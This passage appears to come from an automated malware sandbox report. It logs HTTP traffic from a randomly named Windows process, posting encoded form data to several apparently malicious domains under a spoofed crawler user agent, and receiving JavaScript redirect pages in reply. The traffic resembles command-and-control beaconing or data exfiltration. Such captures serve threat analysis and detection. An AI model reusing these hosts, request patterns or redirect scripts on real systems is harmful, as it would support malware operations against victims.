                                                          Data Raw: 44 30 50 74 73 30 34 3d 2b 58 51 4a 76 39 58 45 73 7a 4b 37 53 4c 6e 56 62 66 42 61 6c 4b 69 43 6b 37 30 32 4a 73 54 41 6b 51 6d 34 51 79 65 74 62 63 74 67 70 74 6e 75 46 2f 44 56 37 74 71 78 50 37 2f 7a 2f 37 4c 4a 43 76 4e 6c 42 61 52 74 2b 76 4c 34 66 2b 2b 37 30 5a 63 32 51 68 48 6b 70 46 33 75 31 48 61 34 63 44 56 53 6c 35 47 54 67 74 6c 44 4f 44 6f 53 54 79 74 73 62 6b 5a 64 63 32 38 6d 6a 6f 57 54 4a 48 35 33 6d 43 70 37 68 6b 5a 73 73 39 4c 32 4b 71 43 63 2f 74 6c 51 55 4a 4f 37 68 46 41 30 6c 52 64 6f 78 42 49 4a 73 50 2b 39 44 6f 7a 45 71 6d 35 43 61 32 2f 4d 33 71 50 69 56 37 6d 7a 38 69 30 70 67 46 50 65 63 4d 78 67 70 6a 31 79 7a 4e 65 62 73 69 71 4a 76 62 49 38 76 57 66 2b 65 41 3d 3d
                                                          Data Ascii: D0Pts04=+XQJv9XEszK7SLnVbfBalKiCk702JsTAkQm4QyetbctgptnuF/DV7tqxP7/z/7LJCvNlBaRt+vL4f++70Zc2QhHkpF3u1Ha4cDVSl5GTgtlDODoSTytsbkZdc28mjoWTJH53mCp7hkZss9L2KqCc/tlQUJO7hFA0lRdoxBIJsP+9DozEqm5Ca2/M3qPiV7mz8i0pgFPecMxgpj1yzNebsiqJvbI8vWf+eA==


                                                          Session ID: 39 | Source IP: 192.168.2.6 | Source Port: 49762 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5396 | Process: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp: Jul 13, 2024 00:05:11.092232943 CEST | Bytes transferred: 1768 | Direction: OUT
                                                          POST /ch4t/ HTTP/1.1
                                                          Host: www.quixaclienti.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.quixaclienti.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1248
                                                          Referer: http://www.quixaclienti.com/ch4t/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 2b 58 51 4a 76 39 58 45 73 7a 4b 37 53 4c 6e 56 62 66 42 61 6c 4b 69 43 6b 37 30 32 4a 73 54 41 6b 51 6d 34 51 79 65 74 62 63 6c 67 6f 66 44 75 45 63 37 56 36 74 71 78 4d 37 2f 75 2f 37 4c 75 43 75 6c 35 42 61 4e 39 2b 71 58 34 5a 63 6d 37 79 72 34 32 61 68 48 6b 30 56 33 76 34 6e 61 58 63 44 46 65 6c 39 69 54 67 74 6c 44 4f 46 55 53 48 57 42 73 5a 6b 5a 61 56 57 39 6e 6e 6f 58 4f 4a 48 68 42 6d 43 74 42 68 56 35 73 72 64 62 32 4d 5a 71 63 7a 74 6c 65 5a 70 4f 56 68 46 4e 73 6c 56 39 53 78 41 4d 6a 73 4e 69 39 48 34 33 59 36 55 68 66 49 30 50 50 6a 4a 2b 46 56 74 36 5a 69 43 49 42 6c 32 53 69 5a 64 5a 57 78 6e 39 79 34 38 33 6d 6c 6b 65 53 72 75 34 72 74 6b 4f 35 4c 6d 4b 71 76 65 32 68 4b 34 61 6d 36 58 63 74 76 65 76 44 62 58 58 53 69 34 43 63 74 54 31 6b 73 56 77 46 62 6b 51 30 35 57 58 69 34 39 31 49 67 31 66 69 61 34 38 79 67 70 31 7a 46 64 44 50 75 70 4c 31 76 62 45 36 73 43 64 5a 35 53 58 38 5a 50 52 7a 77 35 59 74 47 6a 79 6c 53 51 4d 43 50 37 67 57 53 4e 32 2b 53 37 [TRUNCATED]
                                                          Data Ascii: D0Pts04=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 [TRUNCATED]


                                                          Session ID: 40 | Source IP: 192.168.2.6 | Source Port: 49763 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5396 | Process: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp: Jul 13, 2024 00:05:14.257771969 CEST | Bytes transferred: 470 | Direction: OUT
                                                          GET /ch4t/?D0Pts04=zV4psITF3VeqDParSPUqyaC99t0+JvfYyjWfRnGJKOsPmd/sGMCn1Nm1D4KIw/eYCOcCLvh/+vn7ften9OcVQgO4yEfBykK1GR1f38/U+4d5GlEoOVJoTF9oaUkt0L+vFB1wnlQ=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.quixaclienti.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Timestamp: Jul 13, 2024 00:05:14.849314928 CEST | Bytes transferred: 418 | Direction: IN
                                                          HTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Fri, 12 Jul 2024 22:05:14 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 278
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 44 30 50 74 73 30 34 3d 7a 56 34 70 73 49 54 46 33 56 65 71 44 50 61 72 53 50 55 71 79 61 43 39 39 74 30 2b 4a 76 66 59 79 6a 57 66 52 6e 47 4a 4b 4f 73 50 6d 64 2f 73 47 4d 43 6e 31 4e 6d 31 44 34 4b 49 77 2f 65 59 43 4f 63 43 4c 76 68 2f 2b 76 6e 37 66 74 65 6e 39 4f 63 56 51 67 4f 34 79 45 66 42 79 6b 4b 31 47 52 31 66 33 38 2f 55 2b 34 64 35 47 6c 45 6f 4f 56 4a 6f 54 46 39 6f 61 55 6b 74 30 4c 2b 76 46 42 31 77 6e 6c 51 3d 26 51 38 73 3d 74 64 63 64 35 68 37 70 74 6a 6d 64 78 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?D0Pts04=zV4psITF3VeqDParSPUqyaC99t0+JvfYyjWfRnGJKOsPmd/sGMCn1Nm1D4KIw/eYCOcCLvh/+vn7ften9OcVQgO4yEfBykK1GR1f38/U+4d5GlEoOVJoTF9oaUkt0L+vFB1wnlQ=&Q8s=tdcd5h7ptjmdxx"}</script></head></html>


                                                          Session ID: 41 | Source IP: 192.168.2.6 | Source Port: 49765 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5396 | Process: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp: Jul 13, 2024 00:05:20.588257074 CEST | Bytes transferred: 749 | Direction: OUT
                                                          POST /aoam/ HTTP/1.1
                                                          Host: www.789bet1okvip.solutions
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.789bet1okvip.solutions
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.789bet1okvip.solutions/aoam/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 4a 71 54 42 78 78 65 4d 76 73 4e 2f 62 2f 41 35 44 67 43 62 58 46 4f 4e 67 34 39 79 58 5a 35 6a 66 64 38 47 36 6d 55 56 37 70 55 41 64 47 70 55 70 4e 56 32 66 64 2b 4c 67 6f 74 31 48 51 36 48 76 32 43 61 37 47 75 62 76 5a 65 4d 6c 43 37 4b 2f 64 70 46 61 51 77 39 64 53 74 55 49 43 46 76 67 69 55 43 4c 53 5a 53 46 50 70 46 35 71 6b 35 39 2f 74 38 65 7a 37 5a 6e 59 4f 42 75 59 79 64 41 7a 74 57 4c 30 31 47 75 66 41 64 4c 33 76 69 45 35 6d 7a 6b 70 4d 54 71 52 4f 47 62 6a 67 76 76 35 52 43 79 46 61 4a 44 4f 63 6d 39 75 6b 31 43 75 66 4f 71 79 6e 6b 48 68 6e 50 62 74 51 53 35 4e 49 68 6b 56 44 55 54 31 47 48
                                                          Data Ascii: D0Pts04=JqTBxxeMvsN/b/A5DgCbXFONg49yXZ5jfd8G6mUV7pUAdGpUpNV2fd+Lgot1HQ6Hv2Ca7GubvZeMlC7K/dpFaQw9dStUICFvgiUCLSZSFPpF5qk59/t8ez7ZnYOBuYydAztWL01GufAdL3viE5mzkpMTqROGbjgvv5RCyFaJDOcm9uk1CufOqynkHhnPbtQS5NIhkVDUT1GH


                                                          Session ID: 42 | Source IP: 192.168.2.6 | Source Port: 49766 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5396 | Process: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp: Jul 13, 2024 00:05:23.159934044 CEST | Bytes transferred: 773 | Direction: OUT
                                                          POST /aoam/ HTTP/1.1
                                                          Host: www.789bet1okvip.solutions
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.789bet1okvip.solutions
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 236
                                                          Referer: http://www.789bet1okvip.solutions/aoam/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 4a 71 54 42 78 78 65 4d 76 73 4e 2f 5a 66 77 35 47 43 71 62 56 6c 4f 4f 73 59 39 79 64 35 35 6e 66 64 77 47 36 6a 6b 37 37 62 77 41 64 6a 56 55 6f 4a 42 32 50 4e 2b 4c 30 34 73 2f 44 51 36 63 76 32 4f 6b 37 43 71 62 76 64 2b 4d 6c 41 7a 4b 2f 4b 46 43 62 41 77 2f 62 53 74 57 47 69 46 76 67 69 55 43 4c 53 63 61 46 4c 46 46 35 61 30 35 38 61 4e 39 54 54 37 61 7a 49 4f 42 35 49 79 5a 41 7a 74 77 4c 31 35 73 75 64 49 64 4c 31 33 69 45 74 4b 30 2f 35 4d 4a 33 68 4f 58 64 47 4a 31 6f 34 4e 42 36 6e 75 53 59 64 42 46 38 59 6c 76 65 64 66 74 34 69 48 6d 48 6a 2f 39 62 4e 51 34 37 4e 77 68 32 43 50 7a 63 42 6a 6b 4a 72 71 58 68 63 33 43 63 34 61 75 66 5a 47 6b 56 6f 6e 50 51 77 3d 3d
                                                          Data Ascii: D0Pts04=JqTBxxeMvsN/Zfw5GCqbVlOOsY9yd55nfdwG6jk77bwAdjVUoJB2PN+L04s/DQ6cv2Ok7Cqbvd+MlAzK/KFCbAw/bStWGiFvgiUCLScaFLFF5a058aN9TT7azIOB5IyZAztwL15sudIdL13iEtK0/5MJ3hOXdGJ1o4NB6nuSYdBF8Ylvedft4iHmHj/9bNQ47Nwh2CPzcBjkJrqXhc3Cc4aufZGkVonPQw==


                                                          Session ID: 43 | Source IP: 192.168.2.6 | Source Port: 49767 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5396 | Process: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp: Jul 13, 2024 00:05:25.711738110 CEST | Bytes transferred: 1786 | Direction: OUT
                                                          POST /aoam/ HTTP/1.1
                                                          Host: www.789bet1okvip.solutions
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.789bet1okvip.solutions
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1248
                                                          Referer: http://www.789bet1okvip.solutions/aoam/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 4a 71 54 42 78 78 65 4d 76 73 4e 2f 5a 66 77 35 47 43 71 62 56 6c 4f 4f 73 59 39 79 64 35 35 6e 66 64 77 47 36 6a 6b 37 37 62 34 41 64 78 74 55 70 75 74 32 64 64 2b 4c 6f 49 73 38 44 51 37 65 76 79 69 65 37 48 7a 6d 76 62 79 4d 6b 6a 72 4b 6f 6f 39 43 53 41 77 2f 5a 53 74 62 49 43 46 6d 67 6d 35 4c 4c 53 4d 61 46 4c 46 46 35 63 77 35 38 50 74 39 41 6a 37 5a 6e 59 4f 33 75 59 7a 4f 41 7a 31 4f 4c 31 74 57 76 70 45 64 4c 56 6e 69 4a 2b 79 30 7a 35 4d 58 32 68 50 4b 64 47 4d 72 6f 34 51 77 36 6e 32 6f 59 66 64 46 2b 59 68 32 42 5a 48 6b 72 42 44 79 65 67 4b 59 44 37 63 79 33 4d 6c 61 6c 52 4b 41 64 51 48 4f 45 72 61 6a 31 73 2b 43 53 70 76 45 41 50 2b 33 65 62 37 48 48 52 52 50 77 4d 45 52 37 54 64 33 4c 79 70 32 52 4b 77 42 2f 39 57 7a 4f 4f 2f 53 73 42 46 6e 66 4d 57 4e 31 43 36 63 59 77 77 78 44 2b 47 37 52 77 4c 51 77 78 6e 4f 70 73 65 5a 59 33 6f 42 4d 53 42 44 6b 56 74 64 4b 51 68 6d 2f 61 2b 72 75 34 54 36 78 55 45 62 32 57 46 68 34 4f 4a 4c 67 31 46 43 43 4e 4f 65 4c 57 [TRUNCATED]
                                                          Data Ascii: D0Pts04=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 [TRUNCATED]


                                                          Session ID: 44 | Source IP: 192.168.2.6 | Source Port: 49768 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5396 | Process: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp: Jul 13, 2024 00:05:28.251796961 CEST | Bytes transferred: 476 | Direction: OUT
                                                          GET /aoam/?D0Pts04=Eo7hyHn30cp3PMowPDjUS1eso/Zba7hHHMc1+Dk3yrF+CAsKksIOHOuhtM05CC/e3HjWlDqziYa3lDzCuMJvVQxsVStEDyJQgF4EVzhIE64C3aguyc8vXyTVrLHS4c+iCk5yFwg=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.789bet1okvip.solutions
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Timestamp: Jul 13, 2024 00:05:28.717616081 CEST | Bytes transferred: 418 | Direction: IN
                                                          HTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Fri, 12 Jul 2024 22:05:28 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 278
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 44 30 50 74 73 30 34 3d 45 6f 37 68 79 48 6e 33 30 63 70 33 50 4d 6f 77 50 44 6a 55 53 31 65 73 6f 2f 5a 62 61 37 68 48 48 4d 63 31 2b 44 6b 33 79 72 46 2b 43 41 73 4b 6b 73 49 4f 48 4f 75 68 74 4d 30 35 43 43 2f 65 33 48 6a 57 6c 44 71 7a 69 59 61 33 6c 44 7a 43 75 4d 4a 76 56 51 78 73 56 53 74 45 44 79 4a 51 67 46 34 45 56 7a 68 49 45 36 34 43 33 61 67 75 79 63 38 76 58 79 54 56 72 4c 48 53 34 63 2b 69 43 6b 35 79 46 77 67 3d 26 51 38 73 3d 74 64 63 64 35 68 37 70 74 6a 6d 64 78 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?D0Pts04=Eo7hyHn30cp3PMowPDjUS1eso/Zba7hHHMc1+Dk3yrF+CAsKksIOHOuhtM05CC/e3HjWlDqziYa3lDzCuMJvVQxsVStEDyJQgF4EVzhIE64C3aguyc8vXyTVrLHS4c+iCk5yFwg=&Q8s=tdcd5h7ptjmdxx"}</script></head></html>


                                                          Session ID: 45 | Source IP: 192.168.2.6 | Source Port: 49769 | Destination IP: 103.176.91.154 | Destination Port: 80 | PID: 5396 | Process: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp: Jul 13, 2024 00:05:33.782044888 CEST | Bytes transferred: 710 | Direction: OUT
                                                          POST /8c7z/ HTTP/1.1
                                                          Host: www.334es.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.334es.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.334es.com/8c7z/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 68 77 79 4c 65 4b 45 57 54 77 38 78 47 74 51 74 37 4d 6c 37 62 6f 35 56 6e 41 77 4c 72 77 6e 6e 68 51 4d 30 76 63 61 54 39 56 63 74 4b 6b 64 39 52 76 59 54 69 55 78 44 54 66 71 64 67 71 6e 50 6a 6a 6f 6c 44 53 6a 50 6a 32 53 57 74 6e 2f 61 37 62 78 38 4d 6c 46 6d 46 7a 6c 59 6f 63 6f 53 51 74 33 37 54 65 52 66 53 6c 64 45 59 51 4c 47 46 32 78 44 30 41 31 63 43 6b 4e 68 33 78 52 49 66 66 39 39 57 32 56 30 6d 31 6d 4a 56 56 34 2b 4f 79 55 2b 2f 6d 6c 36 41 33 48 30 34 61 72 76 4e 77 52 6e 6e 78 62 6b 4c 30 4a 75 54 36 58 69 63 6e 62 76 33 6c 2f 68 72 4b 6c 77 4d 50 58 75 35 6c 79 35 64 4b 74 61 36 38 79 35
                                                          Data Ascii: D0Pts04=hwyLeKEWTw8xGtQt7Ml7bo5VnAwLrwnnhQM0vcaT9VctKkd9RvYTiUxDTfqdgqnPjjolDSjPj2SWtn/a7bx8MlFmFzlYocoSQt37TeRfSldEYQLGF2xD0A1cCkNh3xRIff99W2V0m1mJVV4+OyU+/ml6A3H04arvNwRnnxbkL0JuT6Xicnbv3l/hrKlwMPXu5ly5dKta68y5
                                                          Jul 13, 2024 00:05:34.592546940 CEST | 552 | IN | HTTP/1.0 200 OK
                                                          Connection: close
                                                          Cache-Control: max-age=259200
                                                          Content-Type: text/html;charset=utf-8
                                                          Content-Length: 423
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 33 30 31 6d 65 69 2e 78 79 7a 3a 37 37 38 38 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 [TRUNCATED]
                                                          Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://301mei.xyz:7788/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          46 | 192.168.2.6 | 49770 | 103.176.91.154 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:05:36.312694073 CEST | 734 | OUT | POST /8c7z/ HTTP/1.1
                                                          Host: www.334es.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.334es.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 236
                                                          Referer: http://www.334es.com/8c7z/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 68 77 79 4c 65 4b 45 57 54 77 38 78 48 4e 67 74 2b 76 64 37 63 49 35 57 37 51 77 4c 77 67 6e 6a 68 51 41 30 76 64 75 44 39 48 6f 74 4b 45 74 39 57 75 59 54 6c 55 78 44 48 50 71 63 74 4b 6e 51 6a 6a 6c 51 44 54 50 50 6a 79 79 57 74 6d 50 61 36 73 63 71 4d 31 46 65 51 44 6c 47 6c 38 6f 53 51 74 33 37 54 65 56 31 53 6c 46 45 59 68 37 47 43 6e 78 45 71 51 31 62 46 6b 4e 68 67 68 52 4d 66 66 38 6f 57 33 4a 4f 6d 7a 71 4a 56 55 49 2b 50 6a 55 78 30 6d 6b 78 66 6e 47 42 37 5a 4b 77 55 52 55 4c 6e 68 33 57 61 58 41 4c 66 73 57 34 41 55 62 4d 6c 31 66 6a 72 49 39 43 4d 76 58 45 37 6c 4b 35 50 64 68 39 31 49 58 61 73 36 6e 72 6c 6d 46 62 4d 44 4b 54 6b 70 6a 63 53 6f 4b 58 31 41 3d 3d
                                                          Data Ascii: D0Pts04=hwyLeKEWTw8xHNgt+vd7cI5W7QwLwgnjhQA0vduD9HotKEt9WuYTlUxDHPqctKnQjjlQDTPPjyyWtmPa6scqM1FeQDlGl8oSQt37TeV1SlFEYh7GCnxEqQ1bFkNhghRMff8oW3JOmzqJVUI+PjUx0mkxfnGB7ZKwURULnh3WaXALfsW4AUbMl1fjrI9CMvXE7lK5Pdh91IXas6nrlmFbMDKTkpjcSoKX1A==
                                                          Jul 13, 2024 00:05:37.102924109 CEST | 552 | IN | HTTP/1.0 200 OK
                                                          Connection: close
                                                          Cache-Control: max-age=259200
                                                          Content-Type: text/html;charset=utf-8
                                                          Content-Length: 423
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 33 30 31 6d 65 69 2e 78 79 7a 3a 37 37 38 38 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 [TRUNCATED]
                                                          Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://301mei.xyz:7788/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          47 | 192.168.2.6 | 49771 | 103.176.91.154 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:05:38.844029903 CEST | 1747 | OUT | POST /8c7z/ HTTP/1.1
                                                          Host: www.334es.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.334es.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1248
                                                          Referer: http://www.334es.com/8c7z/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 68 77 79 4c 65 4b 45 57 54 77 38 78 48 4e 67 74 2b 76 64 37 63 49 35 57 37 51 77 4c 77 67 6e 6a 68 51 41 30 76 64 75 44 39 48 51 74 4b 56 4e 39 51 4e 67 54 6b 55 78 44 45 50 71 42 74 4b 6e 5a 6a 6a 74 63 44 53 79 30 6a 30 2b 57 2f 55 58 61 7a 2b 6b 71 47 31 46 65 50 54 6c 48 6f 63 6f 48 51 70 54 2f 54 66 6c 31 53 6c 46 45 59 69 54 47 52 57 78 45 6f 51 31 63 43 6b 4e 74 33 78 52 6b 66 63 4d 34 57 32 39 65 6c 44 4b 4a 55 30 59 2b 4d 52 38 78 6f 32 6b 7a 63 6e 47 5a 37 5a 47 56 55 52 59 35 6e 68 7a 77 61 56 63 4c 64 4a 76 79 61 58 6a 30 6e 55 33 6e 72 5a 67 6f 4e 72 61 30 38 55 44 42 4b 4e 35 76 2f 59 62 73 6a 4d 72 50 74 67 59 2b 4d 51 53 62 6f 66 61 59 62 72 58 4a 33 47 6b 35 6c 58 61 56 69 4b 4d 38 79 39 4b 4c 38 56 35 6f 77 54 43 68 70 5a 4a 5a 39 4f 2f 71 4f 6d 46 59 55 75 45 65 42 69 30 2b 76 75 4c 63 67 39 41 55 71 77 59 34 76 53 74 72 54 59 57 4f 57 68 73 63 31 59 79 68 31 64 38 78 65 75 48 47 